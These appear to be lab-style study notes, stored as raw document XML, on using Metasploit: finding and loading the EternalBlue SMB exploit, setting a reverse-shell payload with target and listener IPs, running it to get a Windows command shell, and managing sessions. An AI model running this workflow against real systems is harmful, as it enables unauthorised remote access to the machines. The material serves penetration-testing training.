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00" w:after="120"/>
        <w:jc w:val="left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Metasploit Exploitation &amp; Sessions – Structured Notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Metasploit Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Metasploit is an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>exploitation framework</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> used to: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>Discover vulnerabilities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>Launch exploits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>Deliver payloads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>Gain sessions on target systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3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  <w:t>Module Categories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example version output shows: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>2048 exploits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>1105 auxiliary modules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>344 post modules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>562 payloads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>45 encoders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>10 nops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>7 evasion modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Searching and Using Exploits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3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  <w:t>Search for Exploit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search &lt;keyword&gt;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200" w:after="120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0" w:name="code-block-viewer"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search ms17_010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  <w:t>Get Information About Exploit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" w:name="code-block-viewer_Copy_1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>info &lt;module_path&gt;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200" w:after="120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" w:name="code-block-viewer_Copy_2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>info exploit/windows/smb/ms17_010_eternalblue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  <w:t>Use Exploit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" w:name="code-block-viewer_Copy_3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms17_010_eternalblue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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Most exploits have a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>default payload</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, but you can choose another.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3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  <w:t>Show Available Payloads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4" w:name="code-block-viewer_Copy_4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show payloads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  <w:t>Set a Payload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5" w:name="code-block-viewer_Copy_5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set payload &lt;payload_name&gt;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200" w:after="120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6" w:name="code-block-viewer_Copy_6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set payload generic/shell_reverse_tcp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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Module Options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After selecting exploit and payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3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  <w:t>View Options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7" w:name="code-block-viewer_Copy_7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show options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  <w:t>Important Exploit Parameters</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="580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35"/>
        <w:gridCol w:w="3766"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3766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Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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RHOSTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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Target IP address(es)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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RPORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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Target port (default 445 for SMB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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SMBUser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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Username (if authentication required)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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SMBPass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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VERIFY_ARCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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Verifies target architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="203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VERIFY_TARGET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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Verifies target OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine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  <w:t>Important Payload Parameters (Reverse Shell Example)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="414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13"/>
        <w:gridCol w:w="2928"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2928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Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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LHOST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="292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Attacker IP (listener IP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="121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LPORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="292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Listening port (default 4444)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Setting Required Options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3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  <w:t>Set Target IP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8" w:name="code-block-viewer_Copy_8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set RHOSTS &lt;target_ip&gt;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200" w:after="120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9" w:name="code-block-viewer_Copy_9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set RHOSTS 10.10.12.229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  <w:t>Set LHOST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0" w:name="code-block-viewer_Copy_10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LHOST &lt;your_ip&gt;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200" w:after="120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1" w:name="code-block-viewer_Copy_11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LHOST 10.10.186.44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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Running the Exploit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2" w:name="code-block-viewer_Copy_12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit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200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>or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3" w:name="code-block-viewer_Copy_13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run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200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If successful: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>Reverse handler starts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>Target is exploited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>Session is opened</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example result: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12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4" w:name="code-block-viewer_Copy_14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command shell session 1 opened</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="200" w:after="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C:\Windows\system32&gt;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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7. Payload Considerations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Choosing a working payload may require trial and error due to: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>Firewall restrictions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>Antivirus protection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>OS limitations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>Missing dependencies (e.g., Python not installed)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>Network filtering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8. Session Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">When exploitation is successful, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> is created.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A session is an active connection between attacker and target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine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  <w:t>Background a Session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Press: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5" w:name="code-block-viewer_Copy_15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CTRL + Z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200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Then confirm: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6" w:name="code-block-viewer_Copy_16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9. Listing Sessions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3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  <w:t>List Active Sessions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7" w:name="code-block-viewer_Copy_17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sessions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200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>or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8" w:name="code-block-viewer_Copy_18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sessions -l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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10. Interacting with a Session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9" w:name="code-block-viewer_Copy_19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sessions -i &lt;session_id&gt;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200" w:after="120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0" w:name="code-block-viewer_Copy_20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sessions -i 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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11. Sessions Command Options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3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  <w:t>Help Menu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200" w:after="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1" w:name="code-block-viewer_Copy_21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="FreeSans" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sessions -h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  <w:t>Important Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="382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41"/>
        <w:gridCol w:w="2982"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2982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Purpose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-i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="298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Interact with session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-l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="298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List active sessions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-k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="298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Kill specific session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-K</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="298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Kill all sessions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-u</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="298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Upgrade shell to meterpreter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-n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="298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Rename session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-v</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="298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Verbose session list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-d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="298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List inactive sessions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-c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="298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Run command on session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-s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="298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Run script/module on session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12. Example Full Exploitation Workflow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>Search vulnerability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>Use exploit module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>Show payloads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>Set payload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>Set RHOSTS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>Set LHOST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>Show options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>Run exploit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>Gain session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200" w:after="120"/>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Manage sessions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="20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/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13. Key Concepts Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Exploit</w:t>
        <w:br/>
        <w:t>→ Takes advantage of vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Payload</w:t>
        <w:br/>
        <w:t>→ Code executed after successful exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Reverse Shell</w:t>
        <w:br/>
        <w:t>→ Target connects back to attacker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Session</w:t>
        <w:br/>
        <w:t>→ Active control channel between attacker and target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Meterpreter</w:t>
        <w:br/>
        <w:t>→ Advanced post-exploitation shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:after="12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ans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LibreOffice/25.8.4.2$Linux_X86_64 LibreOffice_project/580$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>6</Pages>
  <Words>443</Words>
  <Characters>2615</Characters>
  <CharactersWithSpaces>2882</CharactersWithSpaces>
  <Paragraphs>148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2026-02-22T11:43:46Z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